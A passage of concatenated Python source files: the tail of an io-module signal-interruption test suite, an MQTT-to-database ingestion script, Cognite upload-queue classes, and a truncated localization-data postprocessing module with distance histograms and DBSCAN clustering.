'pthread_sigmask'): # create the thread with SIGALRM signal blocked signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = import_helper.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
mqtt2db.py
#!/usr/bin/python3 from db_ingest import DBIngest import paho.mqtt.client as mqtt from threading import Thread, Condition, Timer from signal import signal, SIGTERM from configuration import env import traceback import json mqtthost = env["MQTTHOST"] scenario = env["SCENARIO"] dbhost = env["DBHOST"] office = list(map(float, env["OFFICE"].split(","))) class MQTT2DB(object): def __init__(self): super(MQTT2DB, self).__init__() self._db = DBIngest(host=dbhost, index="analytics", office=office) self._cache = [] self._cond = Condition() self._mqtt = mqtt.Client() self._mqtt.on_message = self.on_message self._mqtt.on_disconnect = self.on_disconnect def loop(self, topic="analytics"): print("connecting mqtt", flush=True) timer = Timer(10, self._connect_watchdog) timer.start() while True: try: self._mqtt.connect(mqtthost) break except: pass timer.cancel() print("mqtt connected", flush=True) self._stop = False Thread(target=self.todb).start() self._mqtt.subscribe(topic) self._mqtt.loop_forever() def _connect_watchdog(self): print("quit due to mqtt timeout", flush=True) exit(-1) def _add1(self, item=None): self._cond.acquire() if item: self._cache.append(item) self._cond.notify() self._cond.release() def stop(self): self._mqtt.disconnect() def on_disconnect(self, client, userdata, rc): self._stop = True self._add1() def on_message(self, client, userdata, message): try: r = json.loads(str(message.payload.decode("utf-8", "ignore"))) if "tags" in r: r.update(r["tags"]) del r["tags"] if ("time" not in r) and ("real_base" in r) and ("timestamp" in r): real_base=r["real_base"] if "real_base" in r else 0 r["time"] = int((real_base + r["timestamp"]) / 1000000) if "objects" in r and scenario == "traffic": r["nobjects"] = int(len(r["objects"])) if "objects" in r and scenario == "stadium": r["count"] = {"people": len(r["objects"])} if "count" in r: r["nobjects"] = int(max([r["count"][k] for k in r["count"]])) except: print(traceback.format_exc(), flush=True) self._add1(r) def todb(self): while not self._stop: self._cond.acquire() self._cond.wait() bulk = self._cache self._cache = [] self._cond.release() try: self._db.ingest_bulk(bulk) except: print(traceback.format_exc(), flush=True) mqtt2db = MQTT2DB() def quit_service(signum, sigframe): mqtt2db.stop() signal(SIGTERM, quit_service) mqtt2db.loop()
uploader.py
# Copyright 2020 Cognite AS # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Module containing upload queue classes. The UploadQueue classes chunks together items and uploads them together to CDF, both to minimize the load on the API, and also to speed up uploading as requests can be slow. Each upload queue comes with some configurable conditions that, when met, automatically triggers an upload. **Note:** You cannot assume that an element is uploaded when it is added to the queue, since the upload may be delayed. To ensure that everything is uploaded you should set the `post_upload_function` callback to verify. For example, for a time series queue you might want to check the latest time stamp, as such (assuming incremental time stamps and using timestamp-value tuples as data point format): .. code-block:: python state_store = LocalStateStore("states.json") queue = TimeSeriesUploadQueue( cdf_client=my_cognite_client, post_upload_function=state_store.post_upload_handler(), max_upload_interval=1 ) """ import logging import threading import time from abc import ABC, abstractmethod from datetime import datetime from typing import Any, Callable, Dict, List, Optional, Tuple, Union from retry import retry from cognite.client import CogniteClient from cognite.client.data_classes import Event from cognite.client.data_classes.raw import Row from cognite.client.exceptions import CogniteAPIError, CogniteNotFoundError from ._inner_util import _resolve_log_level from .util import EitherId RETRY_BACKOFF_FACTOR = 1.5 RETRY_MAX_DELAY = 15 RETRY_DELAY = 5 RETRIES = 10 DataPointList = Union[ List[Dict[Union[int, float, datetime], Union[int, float, str]]], List[Tuple[Union[int, float, datetime], Union[int, float, str]]], ] class AbstractUploadQueue(ABC): """ Abstract uploader class. Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of the elements that were uploaded. max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Any]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): self.cdf_client = cdf_client self.threshold = max_queue_size if max_queue_size is not None else -1 self.upload_queue_size = 0 self.trigger_log_level = _resolve_log_level(trigger_log_level) self.logger = logging.getLogger(__name__) self.thread = threading.Thread(target=self._run, daemon=True, name=thread_name) self.lock = threading.RLock() self.stopping = threading.Event() self.max_upload_interval = max_upload_interval self.post_upload_function = post_upload_function def _check_triggers(self) -> None: """ Check if upload triggers are met, call upload if they are. Called by subclasses. """ if self.upload_queue_size > self.threshold >= 0: self.logger.log( self.trigger_log_level, f"Upload queue reached threshold size {self.upload_queue_size}/{self.threshold}, triggering upload", ) return self.upload() return None def _post_upload(self, uploaded: List[Any]) -> None: """ Perform post_upload_function to uploaded data, if applicable Args: uploaded: List of uploaded data """ if self.post_upload_function is not None: try: self.post_upload_function(uploaded) except Exception as e: logging.getLogger(__name__).exception("Error during upload callback") @abstractmethod def add_to_upload_queue(self, *args) -> None: """ Adds an element to the upload queue. The queue will be uploaded if the queue byte size is larger than the threshold specified in the config. """ @abstractmethod def upload(self) -> None: """ Uploads the queue. """ def _run(self) -> None: """ Internal run method for upload thread """ while not self.stopping.is_set(): try: self.logger.log(self.trigger_log_level, "Triggering scheduled upload") self.upload() except Exception as e: self.logger.error("Unexpected error while uploading: %s. Skipping this upload.", str(e)) time.sleep(self.max_upload_interval) def start(self) -> None: """ Start upload thread if max_upload_interval is set, this called the upload method every max_upload_interval seconds. """ if self.max_upload_interval is not None: self.stopping.clear() self.thread.start() def stop(self, ensure_upload: bool = True) -> None: """ Stop upload thread if running, and ensures that the upload queue is empty if ensure_upload is True. Args: ensure_upload (bool): (Optional). Call upload one last time after shutting down thread to ensure empty upload queue. """ self.stopping.set() if ensure_upload: self.upload() class RawUploadQueue(AbstractUploadQueue): """ Upload queue for RAW Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of the rows that were uploaded. max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Any]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): # Super sets post_upload and thresholds super().__init__( cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name ) self.upload_queue: Dict[str, Dict[str, List[Row]]] = dict() def add_to_upload_queue(self, database: str, table: str, raw_row: Row) -> None: """ Adds a row to the upload queue. The queue will be uploaded if the queue size is larger than the threshold specified in the __init__. Args: database: The database to upload the Raw object to table: The table to upload the Raw object to raw_row: The row object """ with self.lock: # Ensure that the dicts has correct keys if database not in self.upload_queue: self.upload_queue[database] = dict() if table not in self.upload_queue[database]: self.upload_queue[database][table] = [] # Append row to queue self.upload_queue[database][table].append(raw_row) self.upload_queue_size += 1 self._check_triggers() def upload(self) -> None: """ Trigger an upload of the queue, clears queue afterwards """ with self.lock: for database, tables in self.upload_queue.items(): for table, rows in tables.items(): # Deduplicate # In case of duplicate keys, the first key is preserved, and the last value is preserved. patch: Dict[str, Row] = {r.key: r for r in rows} self._upload_batch(database=database, table=table, patch=list(patch.values())) # Perform post-upload logic if applicable try: self._post_upload(rows) except Exception as e: self.logger.error("Error in upload callback: %s", str(e)) self.upload_queue.clear() self.logger.info(f"Uploaded {self.upload_queue_size} rows in total") self.upload_queue_size = 0 @retry( exceptions=CogniteAPIError, tries=RETRIES, delay=RETRY_DELAY, max_delay=RETRY_MAX_DELAY, backoff=RETRY_BACKOFF_FACTOR, ) def _upload_batch(self, database: str, table: str, patch: List[Row]): # Upload self.cdf_client.raw.rows.insert(db_name=database, table_name=table, row=patch, ensure_parent=True) def __enter__(self) -> "RawUploadQueue": """ Wraps around start method, for use as context manager Returns: self """ self.start() return self def __exit__(self, exc_type, exc_val, exc_tb) -> None: """ Wraps around stop method, for use as context manager Args: exc_type: Exception type exc_val: Exception value exc_tb: Traceback """ self.stop() def __len__(self) -> int: """ The size of the upload queue Returns: Number of elements in queue """ return self.upload_queue_size class TimeSeriesUploadQueue(AbstractUploadQueue): """ Upload queue for time series Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of dicts containing the datapoints that were uploaded (on the same format as the kwargs in datapoints upload in the Cognite SDK). max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Dict[str, Union[str, DataPointList]]]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): # Super sets post_upload and threshold super().__init__( cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name ) self.upload_queue: Dict[EitherId, DataPointList] = dict() def add_to_upload_queue(self, *, id: int = None, external_id: str = None, datapoints: DataPointList = []) -> None: """ Add data points to upload queue. The queue will be uploaded if the queue size is larger than the threshold specified in the __init__. Args: id: Internal ID of time series. Either this or external_id must be set. external_id: External ID of time series. Either this or external_id must be set. datapoints: List of data points to add """ either_id = EitherId(id=id, external_id=external_id) with self.lock: if either_id not in self.upload_queue: self.upload_queue[either_id] = [] self.upload_queue[either_id].extend(datapoints) self.upload_queue_size += len(datapoints) self._check_triggers() def upload(self) -> None: """ Trigger an upload of the queue, clears queue afterwards """ if len(self.upload_queue) == 0: return with self.lock: upload_this = self._upload_batch( [ {either_id.type(): either_id.content(), "datapoints": datapoints} for either_id, datapoints in self.upload_queue.items() if len(datapoints) > 0 ] ) try: self._post_upload(upload_this) except Exception as e: self.logger.error("Error in upload callback: %s", str(e)) self.upload_queue.clear() self.upload_queue_size = 0 @retry( exceptions=CogniteAPIError, tries=RETRIES, delay=RETRY_DELAY, max_delay=RETRY_MAX_DELAY, backoff=RETRY_BACKOFF_FACTOR, ) def _upload_batch(self, upload_this: List[Dict]) -> List[Dict]: if len(upload_this) == 0: return upload_this try: self.cdf_client.datapoints.insert_multiple(upload_this) except CogniteNotFoundError as ex: self.logger.error("Could not upload data points to %s: %s", str(ex.not_found), str(ex)) # Get IDs of time series that exists, but failed because of the non-existing time series retry_these = [EitherId(**id_dict) for id_dict in ex.failed if id_dict not in ex.not_found] # Remove entries with non-existing time series from upload queue upload_this = [ entry for entry in upload_this if EitherId(id=entry.get("id"), external_id=entry.get("externalId")) in retry_these ] # Upload remaining self.cdf_client.datapoints.insert_multiple(upload_this) return upload_this def __enter__(self) -> "TimeSeriesUploadQueue": """ Wraps around start method, for use as context manager Returns: self """ self.start() return self def __exit__(self, exc_type, exc_val, exc_tb) -> None: """ Wraps around stop method, for use as context manager Args: exc_type: Exception type exc_val: Exception value exc_tb: Traceback """ self.stop() def __len__(self) -> int: """ The size of the upload queue Returns: Number of data points in queue """ return self.upload_queue_size class EventUploadQueue(AbstractUploadQueue): """ Upload queue for events Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of the events that were uploaded. max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Event]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): # Super sets post_upload and threshold super().__init__( cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name ) self.upload_queue: List[Event] = [] def add_to_upload_queue(self, event: Event) -> None: """ Add event to upload queue. The queue will be uploaded if the queue size is larger than the threshold specified in the __init__. Args: event: Event to add """ with self.lock: self.upload_queue.append(event) self.upload_queue_size += 1 self._check_triggers() def upload(self) -> None: """ Trigger an upload of the queue, clears queue afterwards """ if len(self.upload_queue) == 0: return with self.lock: self._upload_batch() try: self._post_upload(self.upload_queue) except Exception as e: self.logger.error("Error in upload callback: %s", str(e)) self.upload_queue.clear() self.upload_queue_size = 0 @retry( exceptions=CogniteAPIError, tries=RETRIES, delay=RETRY_DELAY, max_delay=RETRY_MAX_DELAY, backoff=RETRY_BACKOFF_FACTOR, ) def _upload_batch(self): self.cdf_client.events.create([e for e in self.upload_queue]) def __enter__(self) -> "EventUploadQueue": """ Wraps around start method, for use as context manager Returns: self """ self.start() return self def __exit__(self, exc_type, exc_val, exc_tb) -> None: """ Wraps around stop method, for use as context manager Args: exc_type: Exception type exc_val: Exception value exc_tb: Traceback """ self.stop() def __len__(self) -> int: """ The size of the upload queue Returns: Number of events in queue """ return self.upload_queue_size
postprocess.py
""" gui/postprocess ~~~~~~~~~~~~~~~~~~~~ Data analysis of localization lists :author: Joerg Schnitzbauer, 2015 :copyright: Copyright (c) 2015 Jungmann Lab, Max Planck Institute of Biochemistry """ import numpy as _np import numba as _numba from sklearn.cluster import DBSCAN as _DBSCAN from scipy import interpolate as _interpolate from scipy.special import iv as _iv from scipy.spatial import distance from scipy.spatial import ConvexHull from concurrent.futures import ThreadPoolExecutor as _ThreadPoolExecutor import multiprocessing as _multiprocessing import matplotlib.pyplot as _plt import itertools as _itertools import lmfit as _lmfit from collections import OrderedDict as _OrderedDict from . import lib as _lib from . import render as _render from . import imageprocess as _imageprocess from threading import Thread as _Thread import time as _time from tqdm import tqdm as _tqdm from numpy.lib.recfunctions import stack_arrays def get_index_blocks(locs, info, size, callback=None): locs = _lib.ensure_sanity(locs, info) # Sort locs by indices x_index = _np.uint32(locs.x / size) y_index = _np.uint32(locs.y / size) sort_indices = _np.lexsort([x_index, y_index]) locs = locs[sort_indices] x_index = x_index[sort_indices] y_index = y_index[sort_indices] # Allocate block info arrays n_blocks_y, n_blocks_x = index_blocks_shape(info, size) block_starts = _np.zeros((n_blocks_y, n_blocks_x), dtype=_np.uint32) block_ends = _np.zeros((n_blocks_y, n_blocks_x), dtype=_np.uint32) K, L = block_starts.shape # Fill in block starts and ends # We are running this in a thread with a nogil numba function. This helps updating a potential GUI with the callback. if callback is not None: callback(0) counter = [0] else: counter = None thread = _Thread(target=_fill_index_blocks, args=(block_starts, block_ends, x_index, y_index, counter)) thread.start() if callback is not None: while counter[0] < K: callback(counter[0]) _time.sleep(0.1) thread.join() if callback is not None: callback(counter[0]) return locs, size, x_index, y_index, block_starts, block_ends, K, L def index_blocks_shape(info, size): ''' Returns the shape of the index grid, given the movie and grid sizes ''' n_blocks_x = int(_np.ceil(info[0]['Width'] / size)) n_blocks_y = int(_np.ceil(info[0]['Height'] / size)) return n_blocks_y, n_blocks_x @_numba.jit(nopython=True, nogil=True) def n_block_locs_at(x, y, size, K, L, block_starts, block_ends): x_index = _np.uint32(x / size) y_index = _np.uint32(y / size) n_block_locs = 0 for k in range(y_index - 1, y_index + 2): if 0 < k < K: for l in range(x_index - 1, x_index + 2): if 0 < l < L: n_block_locs += block_ends[k, l] - block_starts[k, l] return n_block_locs def get_block_locs_at(x, y, index_blocks): locs, size, x_index, y_index, block_starts, block_ends, K, L = index_blocks x_index = _np.uint32(x / size) # is this really necessary? y_index = _np.uint32(y / size) # is this really necessary? indices = [] for k in range(y_index - 1, y_index+2): if 0 < k < K: for l in range(x_index - 1, x_index + 2): if 0 < l < L: indices.append(list(range(block_starts[k, l], block_ends[k, l]))) indices = list(_itertools.chain(*indices)) return locs[indices] def _fill_index_blocks(block_starts, block_ends, x_index, y_index, counter=None): Y, X = block_starts.shape N = len(x_index) k = 0 if counter is not None: counter[0] = 0 for i in range(Y): for j in range(X): k = _fill_index_block(block_starts, block_ends, N, x_index, y_index, i, j, k) if counter is not None: counter[0] = i+1 @_numba.jit(nopython=True, nogil=True) def _fill_index_block(block_starts, block_ends, N, x_index, y_index, i, j, k): block_starts[i, j] = k while k < N and y_index[k] == i and x_index[k] == j: k += 1 block_ends[i, j] = k return k @_numba.jit(nopython=True, nogil=True) def _distance_histogram(locs, bin_size, r_max, x_index, y_index, block_starts, block_ends, start, chunk): x = locs.x y = locs.y dh_len = _np.uint32(r_max / bin_size) dh = _np.zeros(dh_len, dtype=_np.uint32) r_max_2 = r_max**2 K, L = block_starts.shape end = min(start+chunk, len(locs)) for i in range(start, end): xi = x[i] yi = y[i] ki = y_index[i] li = x_index[i] for k in range(ki, ki+2): if k < K: for l in range(li, li+2): if l < L: for j in range(block_starts[k, l], block_ends[k, l]): if j > i: dx2 = (xi - x[j])**2 if dx2 < r_max_2: dy2 = (yi - y[j])**2 if dy2 < r_max_2: d = _np.sqrt(dx2 + dy2) if d < r_max: bin = _np.uint32(d / bin_size) if bin < dh_len: dh[bin] += 1 return dh def distance_histogram(locs, info, bin_size, r_max): locs, size, x_index, y_index, block_starts, block_ends, K, L = get_index_blocks(locs, info, r_max) N = len(locs) n_threads = _multiprocessing.cpu_count() chunk = int(N / n_threads) starts = range(0, N, chunk) args = [(locs, bin_size, r_max, x_index, y_index, block_starts, block_ends, start, chunk) for start in starts] with _ThreadPoolExecutor() as executor: futures = [executor.submit(_distance_histogram, *_) for _ in args] results = [future.result() for future in futures] return _np.sum(results, axis=0) def nena(locs, info, callback=None): bin_centers, dnfl_ = next_frame_neighbor_distance_histogram(locs, callback) def func(d, a, s, ac, dc, sc): f = a * (d / s**2) * _np.exp(-0.5 * d**2 / s**2) fc = ac * (d / sc**2) * _np.exp(-0.5 * (d**2 + dc**2) / sc**2) * _iv(0, d * dc / sc) return f + fc pdf_model = _lmfit.Model(func) params = _lmfit.Parameters() area = _np.trapz(dnfl_, bin_centers) median_lp = _np.mean([_np.median(locs.lpx), _np.median(locs.lpy)]) params.add('a', value=area/2, min=0) params.add('s', value=median_lp, min=0) params.add('ac', value=area/2, min=0) params.add('dc', value=2*median_lp, min=0) params.add('sc', value=median_lp, min=0) result = pdf_model.fit(dnfl_, params, d=bin_centers) return result, result.best_values['s'] def next_frame_neighbor_distance_histogram(locs, callback=None): locs.sort(kind='mergesort', order='frame') frame = locs.frame x = locs.x y = locs.y if hasattr(locs, 'group'): group = locs.group else: group = _np.zeros(len(locs), dtype=_np.int32) bin_size = 0.001 d_max = 1.0 return _nfndh(frame, x, y, group, d_max, bin_size, callback) def _nfndh(frame, x, y, group, d_max, bin_size, callback=None): N = len(frame) bins = _np.arange(0, d_max, bin_size) dnfl = _np.zeros(len(bins)) one_percent = int(N / 100) starts = one_percent * _np.arange(100) for k, start in enumerate(starts): for i in range(start, start + one_percent): _fill_dnfl(N, frame, x, y, group, i, d_max, dnfl, bin_size) if callback is not None: callback(k+1) bin_centers = bins + bin_size / 2 return bin_centers, dnfl @_numba.jit(nopython=True) def _fill_dnfl(N, frame, x, y, group, i, d_max, dnfl, bin_size): frame_i = frame[i] x_i = x[i] y_i = y[i] group_i = group[i] min_frame = frame_i + 1 for min_index in range(i + 1, N): if frame[min_index] >= min_frame: break max_frame = frame_i + 1 for max_index in range(min_index, N): if frame[max_index] > max_frame: break d_max_2 = d_max**2 for j in range(min_index, max_index): if group[j] == group_i: dx2 = (x_i - x[j])**2 if dx2 <= d_max_2: dy2 = (y_i - y[j])**2 if dy2 <= d_max_2: d = _np.sqrt(dx2 + dy2) if d <= d_max: bin = int(d / bin_size) dnfl[bin] += 1 def pair_correlation(locs, info, bin_size, r_max): dh = distance_histogram(locs, info, bin_size, r_max) #Start with r-> otherwise area will be 0 bins_lower = _np.arange(bin_size, r_max+bin_size, bin_size) if bins_lower.shape[0] > dh.shape[0]: bins_lower = bins_lower[:-1] area = _np.pi * bin_size * (2 * bins_lower + bin_size) return bins_lower, dh / area def dbscan(locs, radius, min_density): print('Identifying clusters...') if hasattr(locs, 'z'): print('z-coordinates detected') pixelsize = int(input("Enter the pixelsize in nm/px:")) locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y) & _np.isfinite(locs.z)] X = _np.vstack((locs.x, locs.y, locs.z/pixelsize)).T db = _DBSCAN(eps=radius, min_samples=min_density).fit(X) group = _np.int32(db.labels_) # int32 for Origin compatiblity locs = _lib.append_to_rec(locs, group, 'group') locs = locs[locs.group != -1] print('Generating cluster information...') groups = _np.unique(locs.group) n_groups = len(groups) mean_frame = _np.zeros(n_groups) std_frame = _np.zeros(n_groups) com_x = _np.zeros(n_groups) com_y = _np.zeros(n_groups) com_z = _np.zeros(n_groups) std_x = _np.zeros(n_groups) std_y = _np.zeros(n_groups) std_z = _np.zeros(n_groups) convex_hull = _np.zeros(n_groups) volume = _np.zeros(n_groups) n = _np.zeros(n_groups, dtype=_np.int32) for i, group in enumerate(groups): group_locs = locs[locs.group == i] mean_frame[i] = _np.mean(group_locs.frame) com_x[i] = _np.mean(group_locs.x) com_y[i] = _np.mean(group_locs.y) com_z[i] = _np.mean(group_locs.z) std_frame[i] = _np.std(group_locs.frame) std_x[i] = _np.std(group_locs.x) std_y[i] = _np.std(group_locs.y) std_z[i] = _np.std(group_locs.z) n[i] = len(group_locs) X_group = _np.stack([group_locs.x,group_locs.y,group_locs.z/pixelsize], axis=0).T volume[i] = _np.power((std_x[i]+std_y[i]+(std_z[i]/pixelsize))/3*2,3)*_np.pi*4/3 try: hull = ConvexHull(X_group) convex_hull[i] = hull.volume except: convex_hull[i] = 0 clusters = _np.rec.array((groups, convex_hull, volume, mean_frame, com_x, com_y, com_z, std_frame, std_x, std_y, std_z, n), dtype=[('groups', groups.dtype),('convex_hull', 'f4'),('volume', 'f4'), ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'),('com_z', 'f4'), ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'),('std_z', 'f4'),('n', 'i4')]) else: locs = locs[_np.isfinite(locs.x) & _np.isfinite(locs.y)] X = _np.vstack((locs.x, locs.y)).T db = _DBSCAN(eps=radius, min_samples=min_density).fit(X) group = _np.int32(db.labels_) # int32 for Origin compatiblity locs = _lib.append_to_rec(locs, group, 'group') locs = locs[locs.group != -1] print('Generating cluster information...') groups = _np.unique(locs.group) n_groups = len(groups) mean_frame = _np.zeros(n_groups) std_frame = _np.zeros(n_groups) com_x = _np.zeros(n_groups) com_y = _np.zeros(n_groups) std_x = _np.zeros(n_groups) std_y = _np.zeros(n_groups) convex_hull = _np.zeros(n_groups) area = _np.zeros(n_groups) n = _np.zeros(n_groups, dtype=_np.int32) for i, group in enumerate(groups): group_locs = locs[locs.group == i] mean_frame[i] = _np.mean(group_locs.frame) com_x[i] = _np.mean(group_locs.x) com_y[i] = _np.mean(group_locs.y) std_frame[i] = _np.std(group_locs.frame) std_x[i] = _np.std(group_locs.x) std_y[i] = _np.std(group_locs.y) n[i] = len(group_locs) X_group = _np.stack([group_locs.x,group_locs.y], axis=0).T area[i] = _np.power((std_x[i]+std_y[i]),2)*_np.pi try: hull = ConvexHull(X_group) convex_hull[i] = hull.volume except: convex_hull[i] = 0 clusters = _np.rec.array((groups, convex_hull, area, mean_frame, com_x, com_y, std_frame, std_x, std_y, n), dtype=[('groups', groups.dtype),('convex_hull', 'f4'),('area', 'f4'), ('mean_frame', 'f4'), ('com_x', 'f4'), ('com_y', 'f4'), ('std_frame', 'f4'), ('std_x', 'f4'), ('std_y', 'f4'), ('n', 'i4')]) return clusters, locs def hdbscan(locs, min_samples, min_cluster_size): print('Identifying clusters...') if 